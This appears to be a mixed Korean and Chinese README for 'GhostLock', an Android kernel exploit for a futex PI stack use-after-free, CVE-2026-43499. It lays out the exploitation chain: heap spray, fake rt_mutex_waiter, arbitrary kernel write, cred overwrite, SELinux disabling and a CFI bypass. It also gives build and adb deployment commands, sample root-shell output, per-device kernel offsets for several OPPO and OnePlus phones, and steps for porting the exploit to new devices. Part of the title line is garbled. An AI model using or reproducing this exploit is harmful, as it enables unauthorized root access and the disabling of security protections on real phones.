
CVE-2026-43499 futex PI 스택 UAF ???????? - Android GKI 6.1~6.12 ??????? pselect() + futex PI ????????????,??? root ??? SELinux??? OPPO Find X8?OnePlus ??????
CVE 번호: CVE-2026-43499
취약점 유형: futex PI(우선순위 상속) 스택 UAF(Use-After-Free)
영향 범위: Linux 커널 6.1 ~ 6.12(Android GKI)
이용 효과: 로컬 권한 상승 + SELinux 비활성화, root shell 획득
用户空间 → pselect() → 内核栈上分配 rt_mutex_waiter
→ futex PI 操作触发 waiter 释放
→ 释放后的 waiter 内存被 fd_set 操作重用
→ 通过精心构造的 fd_set 数据控制 waiter 字段
→ rb_erase() 触发任意内核内存写入
pselect() + futex PI 경쟁을 통해 커널 스택의 rt_mutex_waiter 해제pipe_buffer로 커널 힙을 스프레이하여 fake rt_mutex_waiter 구성rb_erase()의 트리 연산을 이용해 제어된 포인터를 대상 주소에 기록cred 구조체 수정: uid/gid → 0, capabilities → 모두 활성화selinux_state.enforcing → 0ashmem_fops 재스캔으로 CFI 무결성 확인GhostLock/
├── README.md # 本文档
├── src/
│ ├── core/ # 核心利用代码
│ │ ├── main.c # 主入口,漏洞触发
│ │ ├── pipe.c # pipe_buffer 喷射
│ │ ├── fops.c # 文件操作劫持
│ │ ├── root.c # 提权 + SELinux 禁用
│ │ ├── slide.c # 内核地址随机化处理
│ │ ├── util.c # 工具函数
│ │ ├── miniadb.c # 迷你 ADB 服务器
│ │ ├── common.h # 公共定义
│ │ ├── target.h # 目标配置
│ │ ├── offset.h # 偏移量包含
│ │ ├── runtime_offsets.h # 运行时偏移表
│ │ └── kernelsnitch/ # 内核地址探测
│ │ ├── kernelsnitch.h
│ │ ├── futex_hash.h
│ │ ├── utils.h
│ │ └── timeutils.h
│ └── devices/ # 设备适配
│ ├── offsets.h # 偏移量结构定义
│ ├── findx8/ # OPPO Find X8
│ │ └── offsets.h
│ ├── ace6t/ # OnePlus Ace 6T
│ │ └── offsets.h
│ ├── op15/ # OnePlus 15
│ │ └── offsets.h
│ ├── opd2502/ # OnePlus Pad 2
│ │ └── offsets.h
│ └── rmx5070/ # Realme RMX5070
│ └── offsets.h
├── tools/ # 辅助工具
│ └── extract_btf.py # BTF 偏移量提取脚本
├── btf_*.py # BTF 分析脚本集合
├── Makefile # 构建脚本
├── compile.cmd # Windows 编译脚本
├── build.rsp # 编译响应文件
└── ghostlock # 编译产物(ELF aarch64)
# 1. 设置 NDK 路径
export ANDROID_NDK_HOME=/path/to/android-ndk-r27c
# 2. 编译
make
# 3. 或者直接使用 NDK 编译
$ANDROID_NDK_HOME/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android35-clang \
--target=aarch64-linux-android35 \
-O2 -Wall -fPIE -pie -pthread \
-Isrc/core -Isrc/devices \
-DTARGET_CONFIG_H=\"target.h\" \
src/core/*.c -o ghostlock
# 使用提供的 compile.cmd
compile.cmd
# 1. 确认设备连接
adb devices
# 2. 确认内核版本(必须匹配)
adb shell uname -r
# 期望输出: 6.6.118-android15-8-gebdfad32d749-ab15099304-4k
# 3. 推送 exploit 到手机
adb push ghostlock /data/local/tmp/
adb shell chmod 755 /data/local/tmp/ghostlock
# 4. 运行 exploit
adb shell /data/local/tmp/ghostlock
[*] GhostLock - CVE-2026-43499 Local Privilege Escalation
[*] Target kernel: 6.6.118-android15-8-gebdfad32d749-ab15099304-4k
[*] KASLR base: 0xffffffc080000000
[*] ashmem_misc: 0xffffffc08227c518
[*] ashmem_fops: 0xffffffc0812ef5c0
[*] SELinux enforcing: 0xffffffc082358ee0
[*] Exploiting...
[+] PSELECT path activated
[+] Pipe merge path activated
[+] Root shell obtained!
[+] SELinux disabled
[*] miniadb listening on USB...
# 프롬프트(root shell) 표시id 명령에서 uid=0(root) 표시getenforce가 Permissive 반환KIMAGE_TEXT_BASE = 0xffffffc080000000 (Find X8)
PAGE_OFFSET = 0xffffffc000000000
PHYS_OFFSET = 0x40000000
DIRECT_MAP_END = 0xffffffc400000000 (16GB RAM)
direct_map 영역을 스캔하여 mm_struct 위치 확인pipe_buffer로 해제된 waiter 메모리 점유커널 이미지 추출:
# 从手机提取 boot.img
adb pull /dev/block/by-name/boot boot.img
# 或者从固件包中提取
kallsyms 추출:
# 使用 vmlinux-to-elf
python3 -m vmlinux_to_elf boot.img
# 选择 "Extract kallsyms" 选项
BTF 정보 추출:
python3 btf_task2.py > task_full.txt
python3 btf_structs2.py > structs.txt
기기 항목 생성:
mkdir -p src/devices/mydevice
# 复制现有条目作为模板
cp src/devices/findx8/offsets.h src/devices/mydevice/
# 修改偏移量
기기 등록:
src/devices/offsets.h에 추가:
#include "mydevice/offsets.h"
| 정보 |
|---|
# 提取 task_struct 完整成员
python3 btf_task2.py > task_full.txt
# 提取所有关键结构体
python3 btf_structs2.py > structs.txt
# 提取特定结构体
python3 btf_selinux.py > selinux.txt
python3 btf_mm.py > mm.txt
# 提取原始 BTF 数据
python3 btf_raw.py > raw.txt
# 使用 vmlinux-to-elf
python3 -m vmlinux_to_elf extracted/Image.bin
# 或者使用自定义脚本
python3 run_kallsyms_finder.py
⚠️ 경고: 이 도구는 보안 연구 및 승인된 테스트 전용입니다. 승인 없이 타인의 기기에서 사용하는 것은 불법 행위입니다.
이 익스플로잇은 다음과 같은 방법으로 커널의 CFI(Control Flow Integrity) 보호를 우회할 수 있습니다:
ashmem_fops 주소의 유효성 검증copy_splice_read를 합법적인 호출 대상으로 사용Q: "no offsets for kernel: xxx" 오류 발생 A: 커널 버전이 지원되지 않습니다. 기기 항목을 추가해야 합니다
Q: exploit이 멈춤 A: 경쟁 조건 실패일 수 있습니다. 몇 번 다시 시도하세요
Q: kernel panic 발생 A: 가능성은 낮지만(panic_on_oops 미설정), dmesg를 확인할 수 있습니다
# 启用详细输出
adb shell /data/local/tmp/ghostlock -v
# 查看内核日志
adb shell dmesg | tail -50
이 프로젝트는 MIT 라이선스를 사용합니다.
마지막 업데이트: 2026년 8월 13일
작성자: wzh
연락처: [email protected]
| 기기 | 커널 버전 | 상태 |
|---|
| OPPO Find X8 (MT6991) | 6.6.118-android15 | ✅ 지원됨 |
| OnePlus Ace 6T | 6.1.x | ✅ 검증됨 |
| OnePlus 15 | 6.1.x | ✅ 검증됨 |
| OnePlus Pad 2 | 6.1.x | ✅ 검증됨 |
| Realme RMX5070 | 6.1.x | ✅ 검증됨 |
| 심볼 | 오프셋 |
|---|
| init_task | 0x0211E280 |
| init_cred | 0x02130748 |
| selinux_enforcing | 0x02358EE0 |
| ashmem_misc | 0x0227C518 |
| ashmem_fops | 0x012EF5C0 |
| kmalloc_caches | 0x0167A298 |
| 구조체 | 필드 | 오프셋 |
|---|
| task_struct | cred | 0x820 |
| task_struct | real_cred | 0x818 |
| task_struct | tasks | 0x550 |
| task_struct | pi_lock | 0x90C |
| task_struct | seccomp | 0x8E8 |
| cred | uid | 0x08 |
| cred | caps | 0x30 |
| file_operations | ioctl | 0x48 |
| file_operations | splice_read | 0xB8 |
| 출처 |
|---|
| 도구 |
|---|
| 심볼 주소 | kallsyms | vmlinux-to-elf |
| 구조체 오프셋 | BTF | btf_task2.py |
| 물리 메모리 레이아웃 | IKCONFIG | extract-ikconfig |
| 커널 버전 | uname | adb shell uname -r |